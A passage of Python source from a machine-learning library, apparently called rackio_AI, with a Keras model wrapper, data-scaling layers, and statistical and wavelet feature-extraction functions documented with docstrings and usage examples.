Computes Kullback-Leibler divergence loss between y_true and y_pred.
* **[kld(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/kld):**
Computes Kullback-Leibler divergence loss between y_true and y_pred.
* **[kullback_leibler_divergence(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/kullback_leibler_divergence):**
Computes Kullback-Leibler divergence loss between y_true and y_pred.
* **[log_cosh(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/log_cosh):**
Logarithm of the hyperbolic cosine of the prediction error.
* **[logcosh(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/logcosh):**
Logarithm of the hyperbolic cosine of the prediction error.
* **[mae(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/mae):**
Computes the mean absolute error between labels and predictions.
* **[mape(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/mape):**
Computes the mean absolute percentage error between y_true and y_pred.
* **[mean_absolute_error(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/mean_absolute_error):**
Computes the mean absolute error between labels and predictions.
* **[mean_absolute_percentage_error(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/mean_absolute_percentage_error):**
Computes the mean absolute percentage error between y_true and y_pred.
* **[mean_squared_error(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/mean_squared_error):**
Computes the mean squared error between labels and predictions.
* **[mean_squared_logarithmic_error(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/mean_squared_logarithmic_error):**
Computes the mean squared logarithmic error between y_true and y_pred.
* **[mse(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/mse):**
Computes the mean squared error between labels and predictions.
* **[msle(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/msle):**
Computes the mean squared logarithmic error between y_true and y_pred.
* **[poisson(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/poisson):**
Computes the Poisson loss between y_true and y_pred.
* **[serialize(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/serialize):**
Serializes loss function or Loss instance.
* **[sparse_categorical_crossentropy(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/sparse_categorical_crossentropy):**
Computes the sparse categorical crossentropy loss.
* **[squared_hinge(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/squared_hinge):**
Computes the squared hinge loss between y_true and y_pred.
* **:param metrics:** List of metrics to be evaluated by the model during training and testing.
Each of this can be a string (name of a built-in function), function or a
[tf.keras.metrics.Metric](https://www.tensorflow.org/api_docs/python/tf/keras/metrics/Metric) instance.
See [tf.keras.metrics](https://www.tensorflow.org/api_docs/python/tf/keras/metrics).
Typically you will use *metrics=['accuracy']*. A function is any callable with the signature
result = fn(y_true, y_pred). To specify different metrics for different outputs of a multi-output model,
you could also pass a dictionary, such as *metrics={'output_a': 'accuracy', 'output_b': ['accuracy', 'mse']}*.
You can also pass a list *(len = len(outputs))* of lists of metrics such as
*metrics=[['accuracy'], ['accuracy', 'mse']] or metrics=['accuracy', ['accuracy', 'mse']]*.
When you pass the strings 'accuracy' or 'acc', we convert this to one of
[tf.keras.metrics.BinaryAccuracy](https://www.tensorflow.org/api_docs/python/tf/keras/metrics/BinaryAccuracy),
[tf.keras.metrics.CategoricalAccuracy](https://www.tensorflow.org/api_docs/python/tf/keras/metrics/CategoricalAccuracy),
[tf.keras.metrics.SparseCategoricalAccuracy](https://www.tensorflow.org/api_docs/python/tf/keras/metrics/SparseCategoricalAccuracy)
based on the loss function used and the model output shape. We do a similar conversion for the strings
'crossentropy' and 'ce' as well.
* **:param loss_weights:** Optional list or dictionary specifying scalar coefficients (Python floats)
to weight the loss contributions of different model outputs. The loss value that will be minimized
by the model will then be the weighted sum of all individual losses, weighted by the loss_weights coefficients.
If a list, it is expected to have a 1:1 mapping to the model's outputs. If a dict, it is expected
to map output names (strings) to scalar coefficients.
* **:param weighted_metrics:** List of metrics to be evaluated and weighted by sample_weight or class_weight
during training and testing.
* **:param run_eagerly:** Bool. Defaults to *False*. If *True*, this Model's logic will not be wrapped in a
[tf.function](https://www.tensorflow.org/api_docs/python/tf/function). Recommended to leave this as None
unless your Model cannot be run inside a *tf.function*.
* **:param steps_per_execution:** Int. Defaults to 1. The number of batches to run during each tf.function call.
Running multiple batches inside a single tf.function call can greatly improve performance on TPUs or small
models with a large Python overhead. At most, one full epoch will be run each execution.
If a number larger than the size of the epoch is passed, the execution will be truncated to the size of the epoch.
Note that if steps_per_execution is set to N,
[Callback.on_batch_begin and Callback.on_batch_end](https://www.tensorflow.org/api_docs/python/tf/keras/callbacks/Callback)
methods will only be called every N batches (i.e. before/after each tf.function execution).
* **:param kwargs:** Arguments supported for backwards compatibility only.
**Raise**
* **ValueError:** In case of invalid arguments for *optimizer*, *loss* or *metrics*.
"""
super(RackioObserver, self).compile(
optimizer=optimizer,
loss=loss,
metrics=metrics,
loss_weights=loss_weights,
weighted_metrics=weighted_metrics,
run_eagerly=run_eagerly,
steps_per_execution=steps_per_execution,
**kwargs
)
def fit(
self,
*training_data,
validation_data=None,
epochs=3,
callbacks=[
tf.keras.callbacks.EarlyStopping(
monitor='val_loss',
patience=3,
min_delta=1e-6,
mode='min')
],
**kwargs
):
r"""
Trains the model for a fixed number of epochs (iterations on a dataset).
**Parameters**
* **:param x:** Input data. It could be:
* A Numpy array (or array-like), or a list of arrays (in case the model has multiple inputs).
* A TensorFlow tensor, or a list of tensors (in case the model has multiple inputs).
* A dict mapping input names to the corresponding array/tensors, if the model has named inputs.
* A [tf.data](https://www.tensorflow.org/guide/data) dataset. Should return a tuple of either
(inputs, targets) or (inputs, targets, sample_weights).
* A generator or [tf.keras.utils.Sequence](https://www.tensorflow.org/api_docs/python/tf/keras/utils/Sequence)
returning (inputs, targets) or (inputs, targets, sample_weights).
A more detailed description of unpacking behavior for iterator types (Dataset, generator, Sequence)
is given below.
* **:param y:** Target data. Like the input data x, it could be either Numpy array(s) or TensorFlow tensor(s).
It should be consistent with x (you cannot have Numpy inputs and tensor targets, or inversely).
If x is a dataset, generator, or keras.utils.Sequence instance, y should not be specified
(since targets will be obtained from x).
"""
x, y = training_data
history = super(RackioObserver, self).fit(
x,
y,
validation_data=validation_data,
epochs=epochs,
callbacks=callbacks,
**kwargs
)
return history
def predict(self, x, **kwargs):
r"""
Documentation here
"""
return super(RackioObserver, self).predict(x, **kwargs)
def evaluate(
self,
x=None,
y=None,
**kwargs
):
r"""
Documentation here
"""
evaluation = super(RackioObserver, self).evaluate(x, y, **kwargs)
return evaluation
```
#### File: rackio_AI/models/scaler.py
```python
import numpy as np
import tensorflow as tf
class RackioDNNScaler:
r"""
Documentation here
"""
def __init__(self, scaler):
r"""
Documentation here
"""
self.input_scaler = scaler['inputs']
self.output_scaler = scaler['outputs']
def apply(self, inputs, **kwargs):
r"""
Documentation here
"""
# INPUT SCALING
samples, timesteps, features = inputs.shape
_inputs_list = list()
for feature in range(features):
_inputs = tf.reshape(inputs[:, :, feature], (-1, 1))
_inputs = self.input_scaler[feature](_inputs)
print(_inputs)
_inputs = tf.reshape(_inputs, (samples, timesteps, 1))
_inputs_list.append(_inputs)
scaled_inputs = tf.concat(_inputs_list, axis=2)
# scaled_inputs = np.concatenate([
# self.input_scaler[feature](inputs[:, :, feature].reshape(-1, 1)).reshape((samples, timesteps, 1)) for feature in range(features)
# ], axis=2)
# OUTPUT SCALING
if 'outputs' in kwargs:
outputs = kwargs['outputs']
samples, timesteps, features = outputs.shape
_outputs_list = list()
for feature in range(features):
_outputs = tf.reshape(outputs[:, :, feature], (-1, 1))
_outputs = self.output_scaler[feature](_outputs)
_outputs = tf.reshape(_outputs, (samples, timesteps, 1))
_outputs_list.append(_outputs)
scaled_outputs = tf.concat(_outputs_list, axis=2)
# scaled_outputs = np.concatenate([
# self.output_scaler[feature](outputs[:, :, feature].reshape(-1, 1)).reshape((samples, timesteps, 1)) for feature in range(features)
# ], axis=2)
return scaled_inputs, scaled_outputs
return scaled_inputs
def inverse(self, *outputs):
r"""
Documentation here
"""
result = list()
for output in outputs:
features = output.shape[-1]
samples = output.shape[0]
# INVERSE APPLY
scaled_output = np.concatenate([
self.output_scaler[feature].inverse(output[:, feature].reshape(-1, 1)).reshape((samples, features, 1)) for feature in range(features)
], axis=2)
result.append(scaled_output)
return tuple(result)
class RackioDNNLayerScaler(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, X_min, X_max, **kwargs):
r"""
Documentation here
"""
super().__init__(**kwargs)
self.X_min = X_min
self.X_max = X_max
def call(self, X):
r"""
Documentation here
"""
X = (X - self.X_min) / (self.X_max - self.X_min)
return X
def get_config(self):
r"""
Documentation here
"""
base_config = super().get_config()
return {**base_config, "X_max": self.X_max, "X_min": self.X_min}
class RackioDNNLayerInverseScaler(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, y_min, y_max, **kwargs):
r"""
Documentation here
"""
super().__init__(**kwargs)
self.y_min = y_min
self.y_max = y_max
def call(self, y):
r"""
Documentation here
"""
y = y * (self.y_max - self.y_min) + self.y_min
return y
def get_config(self):
r"""
Documentation here
"""
base_config = super().get_config()
return {**base_config, "y_max": self.y_max, "y_min": self.y_min}
```
#### File: rackio_AI/preprocessing/feature_extraction.py
```python
from scipy.stats import kurtosis, skew
from rackio_AI.utils.utils_core import Utils
import pywt
import numpy as np
import pandas as pd
from rackio_AI.decorators.wavelets import WaveletDeco
from easy_deco.progress_bar import ProgressBar
from easy_deco.del_temp_attr import set_to_methods, del_temp_attr
# @set_to_methods(del_temp_attr)
class StatisticalsFeatures:
"""
When we consider the original discretized time domain signal , some basic discriminative
information can be extracted in form of statistical parameters from the $n$ samples
$s_{1},\cdots s_{n}$
"""
_instances = list()
def mean(
self,
s,
axis=None,
dtype=None,
out=None,
keepdims=np._NoValue
):
r"""
Compute the arithmetic mean along the specified axis.
Returns the average of the array elements. The average is taken over
the flattened array by default, otherwise over the specified axis.
`float64` intermediate and return values are used for integer inputs.
**Parameters**
* **s:** (2d array_like) Array containing numbers whose mean is desired. If `s` is not an
array, a conversion is attempted.
* **axis:** (None or int or tuple of ints, optional) Axis or axes along which the means are computed.
The default is to compute the mean of the flattened array.
If this is a tuple of ints, a mean is performed over multiple axes, instead of a single axis or all the
axes as before.
* **dtype:** (data-type, optional) Type to use in computing the mean. For integer inputs, the default
is `float64`; for floating point inputs, it is the same as the input dtype.
* **out:** (ndarray, optional) Alternate output array in which to place the result. The default
is ``None``; if provided, it must have the same shape as the expected output, but the type will be cast if
necessary.
* **keepdims:** (bool, optional) If this is set to True, the axes which are reduced are left
in the result as dimensions with size one. With this option, the result will broadcast correctly against the
input array. If the default value is passed, then `keepdims` will not be passed through to the `mean` method
of sub-classes of `ndarray`, however any non-default value will be. If the sub-class' method does not implement
`keepdims` any exceptions will be raised.
**Returns**
* **m:** (ndarray, see dtype parameter above) If `out=None`, returns a new array containing the mean values,
otherwise a reference to the output array is returned.
## Snippet code
```python
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = np.array([[1, 2], [3, 4]])
>>> feature_extraction.stats.mean(s)
2.5
>>> feature_extraction.stats.mean(s, axis=0)
array([2., 3.])
>>> feature_extraction.stats.mean(s, axis=1)
array([1.5, 3.5])
```
"""
s = Utils.check_dataset_shape(s)
return np.mean(s, axis=axis, dtype=dtype, out=out, keepdims=keepdims)
def median(
self,
s,
axis=None,
out=None,
overwrite_input=False,
keepdims=False
):
r"""
Compute the median along the specified axis.
Returns the median of the array elements.
**Parameters**
* **s:** (2d array_like) Input array or object that can be converted to an array.
* **axis:** ({int, sequence of int, None}, optional) Axis or axes along which the medians \
are computed. The default is to compute the median along a flattened version of the array.
* **out:** (ndarray, optional) Alternative output array in which to place the result. It must
have the same shape and buffer length as the expected output, but the type (of the output)
will be cast if necessary.
* **overwrite_input:** (bool, optional) If True, then allow use of memory of input array
`s` for calculations. The input array will be modified by the call to `median`.
This will save memory when you do not need to preserve the contents of the input array.
Treat the input as undefined, but it will probably be fully or partially sorted. Default is
False. If `overwrite_input` is ``True`` and `s` is not already an `ndarray`, an error
will be raised.
* **keepdims:** (bool, optional) If this is set to True, the axes which are reduced are left
in the result as dimensions with size one. With this option, the result will broadcast
correctly against the original `array`.
**Returns**
* **median:** (ndarray) A new array holding the result. If the input contains integers
or floats smaller than ``float64``, then the output data-type is ``np.float64``.
Otherwise, the data-type of the output is the same as that of the input. If `out` is
specified, that array is returned instead.
## Notes
Given a vector $V$ of length $N$, the median of $V$ is the
middle value of a sorted copy of $V$, $V_{sorted}$ - i
e., $V_{sorted}\left[\frac{N-1}{2}\right]$, when $N$ is odd, and the average of the
two middle values of $V_{sorted}$ when $N$ is even.
## Snippet code
```python
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = np.array([[10, 7, 4], [3, 2, 1]])
>>> feature_extraction.stats.median(s)
3.5
>>> feature_extraction.stats.median(s, axis=0)
array([6.5, 4.5, 2.5])
>>> feature_extraction.stats.median(s, axis=1)
array([7., 2.])
>>> m = feature_extraction.stats.median(s, axis=0)
>>> out = np.zeros_like(m)
>>> feature_extraction.stats.median(s, axis=0, out=m)
array([6.5, 4.5, 2.5])
>>> m
array([6.5, 4.5, 2.5])
>>> b = s.copy()
>>> feature_extraction.stats.median(b, axis=1, overwrite_input=True)
array([7., 2.])
>>> assert not np.all(s==b)
>>> b = s.copy()
>>> feature_extraction.stats.median(b, axis=None, overwrite_input=True)
3.5
>>> assert not np.all(s==b)
```
"""
s = Utils.check_dataset_shape(s)
return np.median(
s,
axis=axis,
out=out,
overwrite_input=overwrite_input,
keepdims=keepdims
)
def kurt(
self,
s,
axis: int=0,
fisher: bool=True,
bias: bool=True,
nan_policy: str='propagate'
):
r"""
Compute the kurtosis (Fisher or Pearson) of a dataset $s$
Kurtosis is the fourth central moment divided by the square of the variance. If Fisher's definiton
is used, then 3.0 is subtracted from the result to give 0.0 for a normal distribution.
If bias is False then the kurtosis is calculated using k statistics to eliminate bias coming from
biased moment estimators
**Parameters**
* **s:** (2d array) Data for which the kurtosis is calculated
* **axis:** (int or None) Axis along which the kurtosis is calculated. Default is 0. If None, compute
over the whole array dataset.
* **fisher:** (bool) If True, Fisher's definition is used (normal ==> 0.0). If False, Pearson's deifnition
is used (normal ==> 3.0)
* **bias:** (bool) If False, then the calculations are corrected for statistical bias.
* **nan_policy:** ({'propagate', 'raise', 'omit'}) Defines how to handle when inputs contains nan. 'propagate'
returns nan, 'raise' throws an error, 'omit' performs the calculations ignoring nan values. Default is propagate.
**returns**
* **kurtosis** (array 1xcols_dataset) The kurtosis of values along an axis. If all values are equal, return -3 for Fisher's definition
and 0 for Pearson's definition
## Snippet Code
```python
>>> from scipy.stats import norm
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = norm.rvs(size=1000, random_state=3)
>>> feature_extraction.stats.kurt(s)
array([-0.06928694])
>>> s = norm.rvs(size=(1000,2), random_state=3)
>>> feature_extraction.stats.kurt(s)
array([-0.00560946, -0.1115389 ])
```
"""
s = Utils.check_dataset_shape(s)
return kurtosis(
s,
axis=axis,
fisher=fisher,
bias=bias,
nan_policy=nan_policy
)
def std(
self,
s,
axis=None,
dtype=None,
out=None,
ddof=0,
keepdims=np._NoValue
):
r"""
Compute the standard deviation along the specified axis.
Returns the standard deviation, a measure of the spread of a distribution,
of the array elements. The standard deviation is computed for the
flattened array by default, otherwise over the specified axis.
**Parameters**
* **s:** (2d array_like) Calculate the standard deviation of these values.
* **axis:** (None or int or tuple of ints, optional) Axis or axes along which the standard deviation is computed.
The default is to compute the standard deviation of the flattened array.
If this is a tuple of ints, a standard deviation is performed over multiple axes, instead of a single
axis or all the axes as before.
* **dtype:** (dtype, optional) Type to use in computing the standard deviation. For arrays of
integer type the default is float64, for arrays of float types it is the same as the array type.
* **out:** (ndarray, optional) Alternative output array in which to place the result. It must have
the same shape as the expected output but the type (of the calculated values) will be cast if necessary.
* **ddof:** (int, optional) Means Delta Degrees of Freedom. The divisor used in calculations
is $N - ddof$, where $N$ represents the number of elements. By default `ddof` is zero.
* **keepdims:** (bool, optional) If this is set to True, the axes which are reduced are left
in the result as dimensions with size one. With this option, the result will broadcast correctly
against the input array. If the default value is passed, then `keepdims` will not be passed through
to the `std` method of sub-classes of `ndarray`, however any non-default value will be. If the
sub-class' method does not implement `keepdims` any exceptions will be raised.
**Returns**
* **standard_deviation:** (ndarray) If `out` is None, return a new array containing the standard deviation,
otherwise return a reference to the output array.
## Notes
The standard deviation is the square root of the average of the squared
deviations from the mean, i.e.
$\mu = \frac{1}{N}\sum_{i=1}^{n}s_{i}$
$std = \sqrt{\frac{1}{N}\sum_{i=1}^{n}|s_{i}-\mu|^2}$
## Snippet code
```python
>>> import numpy as np
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = np.array([[1, 2], [3, 4]])
>>> feature_extraction.stats.std(s, axis=0)
array([1., 1.])
>>> feature_extraction.stats.std(s, axis=1)
array([0.5, 0.5])
```
### In single precision, std() can be inaccurate
```python
>>> s = np.zeros((2, 512*512), dtype=np.float32)
>>> s[0, :] = 1.0
>>> s[1, :] = 0.1
>>> feature_extraction.stats.std(s)
0.45000005
>>> s = np.array([[14, 8, 11, 10], [7, 9, 10, 11], [10, 15, 5, 10]])
>>> feature_extraction.stats.std(s)
2.614064523559687
```
"""
s = Utils.check_dataset_shape(s)
return np.std(
s,
axis=axis,
dtype=dtype,
out=dtype,
ddof=ddof,
keepdims=keepdims
)
def skew(
self,
s,
axis=0,
bias=True,
nan_policy='propagate'
):
r"""
Compute the sample skewness of a data set.
For normally distributed data, the skewness should be about zero. For
unimodal continuous distributions, a skewness value greater than zero means
that there is more weight in the right tail of the distribution. The
function `skewtest` can be used to determine if the skewness value
is close enough to zero, statistically speaking.
**Parameters**
* **s:** (ndarray) Input array.
* **axis:** (int or None, optional) Axis along which skewness is calculated. Default is 0.
If None, compute over the whole array `s`.
* **bias:** (bool, optional) If False, then the calculations are corrected for statistical bias.
* **nan_policy:** ({'propagate', 'raise', 'omit'}, optional) Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
**Returns**
* **skewness:** (ndarray) The skewness of values along an axis, returning 0 where all values are equal.
## Notes
The sample skewness is computed as the Fisher-Pearson coefficient
of skewness, i.e.
$g_1=\frac{m_3}{m_2^{3/2}}$
where
$m_i=\frac{1}{N}\sum_{n=1}^N(x[n]-\bar{x})^i$
is the biased sample $i\texttt{th}$ central moment, and $\bar{x}$ is
the sample mean. If $bias$ is False, the calculations are
corrected for bias and the value computed is the adjusted
Fisher-Pearson standardized moment coefficient, i.e.
$G_1=\frac{k_3}{k_2^{3/2}}=\frac{\sqrt{N(N-1)}}{N-2}\frac{m_3}{m_2^{3/2}}.$
## References
.. [1] <NAME>. and <NAME>. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Section 2.2.24.1
## Snippet code
```python
>>> import numpy as np
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = np.array([1, 2, 3, 4, 5])
>>> feature_extraction.stats.skew(s)
array([0.])
>>> s = np.array([2, 8, 0, 4, 1, 9, 9, 0])
>>> feature_extraction.stats.skew(s)
array([0.26505541])
```
"""
s = Utils.check_dataset_shape(s)
return skew(
s,
axis=axis,
bias=bias,
nan_policy=nan_policy
)
def rms(
self,
s,
axis=None,
dtype=None,
out=None,
keepdims=np._NoValue,
initial=np._NoValue
):
r"""
Root Mean Square One of the most important basic features that can be extracted directly from the time-domain
signal is the RMS which describe the energy of the signal. It is defined as the square root
of the average squared value of the signal and can also be called the normalized energy of the
signal.
$RMS = \sqrt{\frac{1}{n}\sum_{i=0}^{n-1}s_{i}^{2}}$
Especially in vibration analysis the RMS is used to perform fault detection, i.e. triggering an
alarm, whenever the RMS surpasses a level that depends on the size of the machine, the nature
of the signal (for instance velocity or acceleration), the position of the accelerometer, and so on.
After the detection of the existence of a failure, fault diagnosis is performed relying on more
sophisticated features. For instance the ISO 2372 (VDI 2056) norms define three different velocity
RMS alarm levels for four different machine classes divided by power and foundations of the rotating
machines.
RMS of array elements over a given axis.
**Parameters**
* **s:** (2d array_like) Elements to get RMS.
* **axis:** (None or int or tuple of ints, optional) Axis or axes along which a RMS is performed.
The default, axis=None, will get RMS of all the elements of the input array. If axis is negative
it counts from the last to the first axis. If axis is a tuple of ints, a RMS is performed on all
of the axes specified in the tuple instead of a single axis or all the axes as before.
* **dtype:** (dtype, optional) The type of the returned array and of the accumulator in which the
elements are summed. The dtype of `s` is used by default unless `s` has an integer
dtype of less precision than the default platform integer. In that case, if `s` is signed
then the platform integer is used while if `s` is unsigned then an unsigned integer of the
same precision as the platform integer is used.
* **out:** (ndarray, optional) Alternative output array in which to place the result. It must have
the same shape as the expected output, but the type of the output values will be cast if necessary.
* **keepdims:** (bool, optional) If this is set to True, the axes which are reduced are left
in the result as dimensions with size one. With this option, the result will broadcast correctly
against the input array. If the default value is passed, then `keepdims` will not be passed through
to the `sum` method of sub-classes of `ndarray`, however any non-default value will be. If the
sub-class' method does not implement `keepdims` any exceptions will be raised.
* **initial:** (scalar, optional) Starting value for the sum.
**Returns**
* **RMS_along_axis:** (darray) An array with the same shape as `s`, with the specified
axis removed. If `s` is a 0-d array, or if `axis` is None, a scalar is returned.
If an output array is specified, a reference to `out` is returned.
## Snippet code
```python
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> feature_extraction.stats.rms(np.array([0.5, 1.5]))
1.118033988749895
>>> feature_extraction.stats.rms(np.array([0.5, 0.7, 0.2, 1.5]), dtype=np.int32)
0.7071067811865476
>>> feature_extraction.stats.rms(np.array([[0, 1], [0, 5]]))
3.605551275463989
>>> feature_extraction.stats.rms(np.array([[0, 1], [0, 5]]), axis=0)
array([0. , 3.60555128])
>>> feature_extraction.stats.rms(np.array([[0, 1], [0, 5]]), axis=1)
array([0.70710678, 3.53553391])
```
You can also start the sum with a value other than zero:
```python
>>> feature_extraction.stats.rms(np.array([2, 7, 10]), initial=5)
7.2571803523590805
```
"""
s = Utils.check_dataset_shape(s)
return (np.sum(
s ** 2,
axis=axis,
dtype=dtype,
out=out,
keepdims=keepdims,
initial=initial
) / s.shape[0]) ** 0.5
def peak_2_valley(self, s, axis=0):
r"""
Another important measurement of a signal, considering a semantically coherent sampling
interval, for instance a fixed-length interval or one period of a rotation, is the peak-to-valley
(PV) value which reflects the amplitude spread of a signal:
$PV=\frac{1}{2}\left(\max(s)\quad -\quad \min(s)\right)$
**Parameters**
* **s:**
* **axis:**
**Returns**
* **peak_2_valley:**
## Snippet code
```python
>>> from scipy.stats import norm
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = norm.rvs(size=1000, random_state=3)
>>> feature_extraction.stats.peak_2_valley(s)
array([3.34321422])
>>> s = norm.rvs(size=(1000,2), random_state=3)
>>> feature_extraction.stats.peak_2_valley(s)
array([2.99293034, 3.34321422])
```
"""
s = Utils.check_dataset_shape(s)
return (np.max(s, axis=axis)-np.min(s, axis=axis)) / 2
def peak(self, s, ref=None, axis=0, rate=None, **kwargs):
r"""
I we consider only the maximum amplitude relative to zero $s_{ref}=0$ or a general reference
level $s_{ref}$, we get the peak value
$peak = \max\left(s_{i}-ref\right)$
Often the peak is used in conjunction with other statistical parameters, for instance the
peak-to-average rate.
$peak = \frac{\max\left(s_{i}-ref\right)}{\frac{1}{N}\sum_{i=0}^{N-1}s_{i}}$
or peak-to-median rate
**Parameters**
* **s:**
* **ref:**
* **axis:**
* **rate:**
**Returns**
* **peak:**
## Snippet code
```python
>>> from scipy.stats import norm
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = norm.rvs(size=1000, random_state=3)
>>> feature_extraction.stats.peak(s)
array([1.91382976])
>>> s = norm.rvs(size=(1000,2), random_state=3)
>>> feature_extraction.stats.peak(s)
array([1.0232499 , 3.26594839])
```
"""
s = Utils.check_dataset_shape(s)
if not ref == None:
_peak = np.max(s - ref, axis=axis)
else:
_peak = np.max(s - s[0,:], axis=axis)
if not rate == None:
if rate.lower() == 'average':
return _peak / self.mean(s, **kwargs)
elif rate.lower() == 'median':
return _peak / self.median(s, **kwargs)
else:
return _peak
def crest_factor(self, s, **kwargs):
r"""
When we relate the peak value to the RMS of the signal, we obtain the crest facto:
$CF=\frac{peak}{RMS}$
which expresses the spikiness of the signal. The crest factor is also known as peak-to-average
ratio or peak-to-average power ratio and is used to characterize signals containing repetitive
impulses in addition to a lower level continuous signal. The modulus of the signal should be
used in the calculus.
**Parameters**
* **s:**
**Returns**
* **crest_factor:**
## Snippet code
```python
>>> from scipy.stats import norm
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = norm.rvs(size=1000, random_state=3)
>>> feature_extraction.stats.crest_factor(s)
array([1.89760521])
>>> s = norm.rvs(size=(1000,2), random_state=3)
>>> feature_extraction.stats.crest_factor(s)
array([0.71532677, 2.28313758])
```
"""
peak = self.peak(s, **kwargs)
rms = self.rms(s, **kwargs)
return peak / rms
# @set_to_methods(del_temp_attr)
class Wavelet:
r"""
A wavelet is a mathematical function used to divide a given function or continuous-time
signal into different scale components. Usually one can assign a frequency range to each
scale component. Each scale component can then be studied with a resolution that matches
its scale. A wavelet transform is the representation of a function by wavelets.
The wavelets are scaled and translated copies (known as "daughter wavelets") of a
finite-length or fast-decaying oscillating waveform (known as the "mother wavelet").
Wavelet transforms have advantages over traditional Fourier transforms for representing
functions that have discontinuities and sharp peaks, and for accurately deconstructing
and reconstructing finite, non-periodic and/or non-stationary signals.
"""
_instances = list()
@WaveletDeco.is_valid
@WaveletDeco.mode_is_valid
def wavedec(self, s, wavelet, mode='symmetric', level=None, axis=-1):
r"""
Multilevel 1D Discrete Wavelet Transform of signal $s$
**Parameters**
* **s:** (array_like) Input data
* **wavelet:** (Wavelet object or name string) Wavelet to use
* **mode:** (str) Signal extension mode.
* **level:** (int) Decomposition level (must be >= 0). If level is None (default)
then it will be calculated using the `dwt_max_level` function.
* **axis:** (int) Axis over which to compute the DWT. If not given, the last axis
is used.
**Returns**
* **[cA_n, cD_n, cD_n-1, ..., cD2, cD1]:** (list) Ordered list of coefficients arrays where
$n$ denotes the level of decomposition. The first element `(cA_n)` of the result is approximation
coefficients array and the following elements `[cD_n - cD1]` are details coefficients arrays.
## Snippet code
```python
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> coeffs = feature_extraction.freq.wavelet.wavedec([1,2,3,4,5,6,7,8], 'db1', level=2)
>>> cA2, cD2, cD1 = coeffs
>>> cD1
array([-0.70710678, -0.70710678, -0.70710678, -0.70710678])
>>> cD2
array([-2., -2.])
>>> cA2
array([ 5., 13.])
>>> s = np.array([[1,1], [2,2], [3,3], [4,4], [5, 5], [6, 6], [7, 7], [8, 8]])
>>> coeffs = feature_extraction.freq.wavelet.wavedec(s, 'db1', level=2, axis=0)
>>> cA2, cD2, cD1 = coeffs
>>> cD1
array([[-0.70710678, -0.70710678],
[-0.70710678, -0.70710678],
[-0.70710678, -0.70710678],
[-0.70710678, -0.70710678]])
>>> cD2
array([[-2., -2.],
[-2., -2.]])
>>> cA2
array([[ 5., 5.],
[13., 13.]])
```
"""
coeffs = pywt.wavedec(s, wavelet, mode=mode, level=level, axis=axis)
return coeffs
def wave_energy(self, s, wavelet, mode='symmetric', level=None, axis=-1):
r"""
The energy of time-series data distributed in Approximate and Detailed coefficients
are calculated as follows:
$ED_{i}=\sum_{j=1}^{N}|D_{ij}|^2,\quad i={1,2,\cdots,level}$
$EA_{level}=\sum_{j=1}^{N}|A_{lj}|^2$
Where $ED_{i}$ represents energy in the $i^{th}$ detailed coefficient and $EA_{level}$
is the energy in the $level^{th}$ approximate coefficient respectively. Further, the
fraction of total signal energy present in the approximate and detailed components is
calculated which serves as a feature vector for every sensor.
**Parameters**
* **s:** (array_like) Input data
* **wavelet:** (Wavelet object or name string) Wavelet to use
* **mode:** (str) Signal extension mode.
* **level:** (int) Decomposition level (must be >= 0). If level is None (default)
then it will be calculated using the `dwt_max_level` function.
* **axis:** (int) Axis over which to compute the DWT. If not given, the last axis
is used.
**Returns**
* **[EA_n, ED_n, ED_n-1, ..., ED2, ED1]:** (list) Ordered list of energy arrays where
$n$ denotes the level of decomposition.
## Snippet code
```python
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> energies = feature_extraction.freq.wavelet.wave_energy([1,2,3,4,5,6,7,8], 'db1', level=2)
>>> eA2, eD2, eD1 = energies
>>> eD1
2.000000000000001
>>> eD2
8.000000000000004
>>> eA2
194.00000000000006
>>> s = np.array([[1,1], [2,2], [3,3], [4,4], [5, 5], [6, 6], [7, 7], [8, 8]])
>>> energies = feature_extraction.freq.wavelet.wave_energy(s, 'db1', level=2, axis=0)
>>> eA2, eD2, eD1 = energies
>>> eD1
array([2., 2.])
>>> eD2
array([8., 8.])
>>> eA2
array([194., 194.])
```
"""
energy = list()
# Wavelet decomposition
coeffs = self.wavedec(s, wavelet, mode=mode, level=level, axis=axis)
# Get approximation coefficients
approximation_coeff = coeffs.pop(0)
# Energy approximation computation
energy.append(np.sum(approximation_coeff ** 2, axis=axis))
# Energy detailed computation
for detailed_coeff in coeffs:
energy.append(np.sum(detailed_coeff ** 2, axis=axis))
return energy
def get_energies(
self,
s,
input_cols=None,
output_cols=None,
timesteps=10,
wavelet_type='db2',
wavelet_lvl=2,
axis=0,
slide=False
):
r"""
Documentation here
"""
self._s_ = s
self.wavelet_type = wavelet_type
